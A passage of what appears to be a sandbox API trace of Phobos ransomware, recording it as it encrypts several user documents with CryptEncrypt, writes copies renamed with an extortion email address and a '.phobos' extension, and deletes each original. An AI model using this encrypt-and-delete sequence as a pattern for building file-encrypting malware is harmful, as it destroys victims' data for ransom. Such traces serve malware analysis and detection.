lpNumberOfBytesWritten=0x2f4fc90*=0xdfa0, lpOverlapped=0x0) returned 1 [0196.236] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.236] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.236] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.236] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.236] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.237] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.237] CloseHandle (hObject=0xac) returned 1 [0196.237] CloseHandle (hObject=0x180) returned 1 [0196.237] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\0o-e7mR20i.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\0o-e7mr20i.csv")) returned 1 [0196.238] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\aXmuGdOcVBE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\axmugdocvbe.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.239] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=76518) returned 1 [0196.239] CloseHandle (hObject=0x180) returned 1 [0196.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\aXmuGdOcVBE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\axmugdocvbe.ods")) returned 0x20 [0196.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\aXmuGdOcVBE.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\axmugdocvbe.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\aXmuGdOcVBE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\axmugdocvbe.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.241] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.241] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\aXmuGdOcVBE.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\axmugdocvbe.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.242] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0196.242] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.242] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12ae6, lpOverlapped=0x0) returned 1 [0196.243] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12af0, dwBufLen=0x12af0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12af0) returned 1 [0196.244] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12af0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12af0, lpOverlapped=0x0) returned 1 [0196.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.246] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.246] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.246] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.246] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.246] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.246] CloseHandle (hObject=0x180) returned 1 [0196.246] CloseHandle (hObject=0xac) returned 1 [0196.246] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\aXmuGdOcVBE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\axmugdocvbe.ods")) returned 1 [0196.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\Fa5ewUOgzE3xDAR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\fa5ewuogze3xdar.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.379] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13043) returned 1 [0196.379] CloseHandle (hObject=0xb8) returned 1 [0196.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\Fa5ewUOgzE3xDAR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\fa5ewuogze3xdar.xls")) returned 0x20 [0196.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\Fa5ewUOgzE3xDAR.xls.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\fa5ewuogze3xdar.xls.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\Fa5ewUOgzE3xDAR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\fa5ewuogze3xdar.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.379] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.380] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\Fa5ewUOgzE3xDAR.xls.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\fa5ewuogze3xdar.xls.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc [0196.380] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0196.380] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.380] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x32f3, lpOverlapped=0x0) returned 1 [0196.382] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3300, dwBufLen=0x3300 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3300) returned 1 [0196.382] WriteFile (in: hFile=0xbc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3300, lpOverlapped=0x0) returned 1 [0196.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0196.383] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.383] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.383] CryptDestroyKey (hKey=0xa32968) returned 1 [0196.383] WriteFile (in: hFile=0xbc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.383] CryptDestroyKey (hKey=0xa32d68) returned 1 [0196.383] CloseHandle (hObject=0xb8) returned 1 [0196.383] CloseHandle (hObject=0xbc) returned 1 [0196.383] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\wSEjhu9leF-\\Fa5ewUOgzE3xDAR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\wsejhu9lef-\\fa5ewuogze3xdar.xls")) returned 1 [0196.384] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\DeNpiK9Oud.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\denpik9oud.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc [0196.386] GetFileSizeEx (in: hFile=0xbc, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=50242) returned 1 [0196.386] CloseHandle (hObject=0xbc) returned 1 [0196.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\DeNpiK9Oud.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\denpik9oud.doc")) returned 0x20 [0196.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\DeNpiK9Oud.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\denpik9oud.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\DeNpiK9Oud.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\denpik9oud.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc [0196.386] SetFilePointerEx (in: hFile=0xbc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.386] SetFilePointerEx (in: hFile=0xbc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\DeNpiK9Oud.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\denpik9oud.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a68) returned 1 [0196.410] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.410] ReadFile (in: hFile=0xbc, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc442, lpOverlapped=0x0) returned 1 [0196.411] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc450, dwBufLen=0xc450 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc450) returned 1 [0196.463] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc450, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc450, lpOverlapped=0x0) returned 1 [0196.464] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0196.464] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.464] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.464] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.464] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.464] CryptDestroyKey (hKey=0xa32a68) returned 1 [0196.464] CloseHandle (hObject=0xbc) returned 1 [0196.464] CloseHandle (hObject=0x178) returned 1 [0196.465] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\DeNpiK9Oud.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\denpik9oud.doc")) returned 1 [0196.466] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\V2whzYbVGT.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\v2whzybvgt.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.467] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=22615) returned 1 [0196.467] CloseHandle (hObject=0x178) returned 1 [0196.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\V2whzYbVGT.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\v2whzybvgt.pdf")) returned 0x20 [0196.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\V2whzYbVGT.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\v2whzybvgt.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\V2whzYbVGT.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\v2whzybvgt.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.467] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.467] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\V2whzYbVGT.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\v2whzybvgt.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc [0196.468] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a68) returned 1 [0196.468] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.468] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5857, lpOverlapped=0x0) returned 1 [0196.623] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5860, dwBufLen=0x5860 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5860) returned 1 [0196.623] WriteFile (in: hFile=0xbc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5860, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5860, lpOverlapped=0x0) returned 1 [0196.624] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0196.624] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.624] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.624] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.624] WriteFile (in: hFile=0xbc, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.625] CryptDestroyKey (hKey=0xa32a68) returned 1 [0196.625] CloseHandle (hObject=0x178) returned 1 [0196.625] CloseHandle (hObject=0xbc) returned 1 [0196.625] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\V2whzYbVGT.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\v2whzybvgt.pdf")) returned 1 [0196.626] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\9p1v7bjt7T1RE5.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\9p1v7bjt7t1re5.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.633] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=48104) returned 1 [0196.633] CloseHandle (hObject=0x154) returned 1 [0196.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\9p1v7bjt7T1RE5.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\9p1v7bjt7t1re5.ods")) returned 0x20 [0196.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\9p1v7bjt7T1RE5.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\9p1v7bjt7t1re5.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\9p1v7bjt7T1RE5.ods" (normalized: 